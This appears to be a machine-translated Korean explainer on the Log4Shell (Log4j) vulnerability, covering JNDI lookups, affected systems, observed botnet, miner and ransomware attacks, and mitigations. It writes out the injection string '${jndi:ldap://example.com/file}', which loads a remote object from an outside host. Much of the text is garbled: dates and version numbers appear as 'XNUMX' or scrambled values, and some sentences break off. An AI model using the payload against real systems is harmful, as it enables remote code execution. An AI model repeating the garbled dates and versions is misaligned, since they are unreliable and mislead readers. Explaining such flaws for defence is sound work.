차례[숨다][보여 주다]
2021년 XNUMX월 말, 우리는 사이버 보안에 대한 주요 위협을 발견했습니다. 이 악용은 잠재적으로 전 세계 수백만 대의 컴퓨터 시스템에 영향을 줄 수 있습니다.
이것은 Log4j 취약점과 어떻게 간과된 설계 결함으로 인해 전 세계 컴퓨터 서비스의 90% 이상이 공격에 노출되었는지에 대한 가이드입니다.
Apache Log4j는 Apache Software Foundation에서 개발한 오픈 소스 Java 기반 로깅 유틸리티입니다. 원래 2001년에 Ceki Gülcü가 작성했으며 현재 Apache Software Foundation의 프로젝트인 Apache Logging Services의 일부입니다.
전 세계의 회사는 Log4j 라이브러리를 사용하여 애플리케이션에서 로깅을 활성화합니다. 실제로 Java 라이브러리는 어디에나 있으므로 Amazon, Microsoft, Google 등의 애플리케이션에서 찾을 수 있습니다.
라이브러리의 중요성은 코드의 잠재적인 결함으로 인해 수백만 대의 컴퓨터가 해킹에 노출될 수 있음을 의미합니다. 24년 2021월 XNUMX일, 클라우드 보안 Alibaba에서 일하는 연구원은 끔찍한 결함을 발견했습니다.
Log4Shell이라고도 하는 Log4j 취약점은 2013년 이후로 발견되지 않았습니다. 이 취약점으로 인해 악의적인 행위자가 Log4j를 실행하는 영향을 받는 시스템에서 코드를 실행할 수 있습니다. 9년 2021월 XNUMX일에 공개되었습니다.
업계 전문가들은 Log4Shell 결함을 최근 메모리에서 가장 큰 취약점.
취약점이 공개된 다음 주에 사이버 보안 팀은 수백만 건의 공격을 탐지했습니다. 일부 연구원은 분당 XNUMX회 이상의 공격 속도를 관찰하기도 했습니다.
어떻게 진행합니까?
Log4Shell이 왜 그렇게 위험한지 이해하려면 그것이 무엇을 할 수 있는지 이해해야 합니다.
Log4Shell 취약점은 임의의 코드 실행을 허용합니다. 이는 기본적으로 공격자가 대상 시스템에서 모든 명령이나 코드를 실행할 수 있음을 의미합니다.
이를 어떻게 수행합니까?
먼저 JNDI가 무엇인지 이해해야 합니다.
JNDI(Java Naming and Directory Interface)는 Java 프로그램이 이름을 통해 데이터와 리소스를 검색하고 조회할 수 있도록 하는 Java 서비스입니다. 이러한 디렉터리 서비스는 개발자가 응용 프로그램을 만들 때 쉽게 참조할 수 있도록 구성된 레코드 집합을 제공하기 때문에 중요합니다.
JNDI는 다양한 프로토콜을 사용하여 특정 디렉토리에 액세스할 수 있습니다. 이러한 프로토콜 중 하나는 LDAP(Lightweight Directory Access Protocol)입니다.
문자열을 기록할 때, 로그4j 형식의 표현식을 만날 때 문자열 대체를 수행합니다. ${prefix:name}
.
예를 들어, Text: ${java:version}
Text: Java 버전 1.8.0_65로 기록될 수 있습니다. 이러한 종류의 대체는 일반적입니다.
우리는 또한 다음과 같은 표현을 가질 수 있습니다. Text: ${jndi:ldap://example.com/file}
JNDI 시스템을 사용하여 LDAP 프로토콜을 통해 URL에서 Java 객체를 로드합니다.
이렇게 하면 해당 URL에서 머신으로 오는 데이터를 효과적으로 로드합니다. 잠재적인 해커는 공개 URL에 악성 코드를 호스팅하고 Log4j를 사용하는 시스템이 이를 기록할 때까지 기다릴 수 있습니다.
로그 메시지의 내용에는 사용자 제어 데이터가 포함되어 있으므로 해커는 자신이 제어하는 LDAP 서버를 가리키는 자체 JNDI 참조를 삽입할 수 있습니다. 이러한 LDAP 서버는 JNDI가 취약점을 통해 실행할 수 있는 악성 Java 개체로 가득 차 있을 수 있습니다.
이것을 더 나쁘게 만드는 것은 응용 프로그램이 서버 측 또는 클라이언트 측 응용 프로그램인지 여부가 중요하지 않다는 것입니다.
로거가 공격자의 악성 코드를 읽을 수 있는 방법이 있는 한 응용 프로그램은 여전히 악용될 수 있습니다.
누가 영향을 받습니까?
취약점은 버전 4부터 2.0까지의 APache Log2.14.1j를 사용하는 모든 시스템 및 서비스에 영향을 미칩니다.
여러 보안 전문가들은 이 취약점이 Java를 사용하는 여러 애플리케이션에 영향을 줄 수 있다고 조언합니다.
이 결함은 Microsoft 소유의 Minecraft 비디오 게임에서 처음 발견되었습니다. Microsoft는 위험을 방지하기 위해 사용자에게 Java 에디션 Minecraft 소프트웨어를 업그레이드할 것을 촉구했습니다.
사이버 보안 및 인프라 보안국(CISA)의 이사인 Jen Easterly는 공급업체가 주요 책임 최종 사용자가 이 취약점을 악용하는 악의적인 행위자로부터 보호합니다.
"또한 공급업체는 최종 사용자가 제품에 이 취약점이 포함되어 있음을 알리고 소프트웨어 업데이트를 우선적으로 처리해야 함을 고객과 소통해야 합니다."
공격은 이미 시작된 것으로 알려졌다. 사이버 보안 소프트웨어를 제공하는 회사인 시만텍은 다양한 공격 요청을 관찰했습니다.
다음은 연구원들이 탐지한 공격 유형의 몇 가지 예입니다.
- 봇넷
봇넷은 단일 공격자의 제어 하에 있는 컴퓨터 네트워크입니다. DDoS 공격, 데이터 도용 및 기타 사기를 수행하는 데 도움이 됩니다. 연구원들은 Log4j 익스플로잇에서 다운로드한 셸 스크립트에서 Muhstik 봇넷을 관찰했습니다.
- XMRig 광부 트로이 목마
XMRig는 CPU를 사용하여 Monero 토큰을 채굴하는 오픈 소스 암호화폐 채굴기입니다. 사이버 범죄자는 사람들이 모르는 사이에 처리 능력을 사용할 수 있도록 사람들의 장치에 XMRig를 설치할 수 있습니다.
- 콘사리 랜섬웨어
랜섬웨어는 악성코드의 일종으로 파일 암호화 컴퓨터에서. 그런 다음 공격자는 암호화된 파일에 대한 액세스를 다시 제공하는 대가로 지불을 요구할 수 있습니다. 연구원들은 Log4Shell 공격에서 Khonsari 랜섬웨어를 발견했습니다. Windows 서버를 대상으로 하고 .NET 프레임워크를 사용합니다.
결론은 어떻게되는데?
전문가들은 Log4J 취약점으로 인한 혼란을 완전히 해결하는 데 몇 달 또는 몇 년이 걸릴 수 있다고 예측합니다.
이 프로세스에는 영향을 받는 모든 시스템을 패치 버전으로 업데이트하는 작업이 포함됩니다. 이러한 모든 시스템에 패치가 적용되더라도 해커가 서버가 공격을 위해 열려 있는 창에 이미 추가했을 수 있는 백도어 가능성의 위협이 여전히 존재합니다.
많은 솔루션 및 완화 응용 프로그램이 이 버그에 의해 악용되는 것을 방지하기 위해 존재합니다. 새로운 Log4j 버전 2.15.0-rc1은 이 취약점을 완화하기 위해 다양한 설정을 변경했습니다.
JNDI를 사용하는 모든 기능은 기본적으로 비활성화되며 원격 조회도 제한됩니다. Log4j 설정에서 조회 기능을 비활성화하면 가능한 악용의 위험을 줄이는 데 도움이 됩니다.
Log4j 외부에서는 여전히 오픈 소스 악용을 방지하기 위한 보다 광범위한 계획이 필요합니다.
앞서 백악관은 지난 XNUMX월 행정 명령 국가 사이버 보안을 향상시키기 위한 것입니다. 여기에는 본질적으로 응용 프로그램을 구축하는 데 필요한 모든 항목의 목록이 포함된 공식 문서인 소프트웨어 자재 명세서(SBOM)에 대한 조항이 포함되었습니다.
여기에는 다음과 같은 부품이 포함됩니다. 오픈 소스 개발에 사용되는 패키지, 종속성 및 API. SBOM의 아이디어는 투명성에 도움이 되지만 실제로 소비자에게 도움이 될까요?
종속성을 업그레이드하는 것은 너무 번거로울 수 있습니다. 회사는 대안 패키지를 찾는 데 추가 시간을 낭비하는 위험을 감수하기보다 벌금을 지불하기로 선택할 수 있습니다. 아마도 이러한 SBOM은 다음과 같은 경우에만 유용할 것입니다. 범위 더 제한됩니다.
결론
Log4j 문제는 조직의 기술적인 문제 그 이상입니다.
비즈니스 리더는 서버, 제품 또는 서비스가 자체적으로 유지 관리하지 않는 코드에 의존할 때 발생할 수 있는 잠재적인 위험을 인식해야 합니다.
오픈 소스 및 타사 애플리케이션에 의존하는 것은 항상 어느 정도의 위험을 수반합니다. 기업은 새로운 위협이 나타나기 전에 위험 완화 전략을 수립하는 것을 고려해야 합니다.
웹의 대부분은 전 세계적으로 수천 명의 자원 봉사자가 유지 관리하는 오픈 소스 소프트웨어에 의존합니다.
웹을 안전한 장소로 유지하려면 정부와 기업이 다음과 같은 오픈 소스 노력과 사이버 보안 기관에 자금을 지원하는 데 투자해야 합니다. CISA.
댓글을 남겨주세요.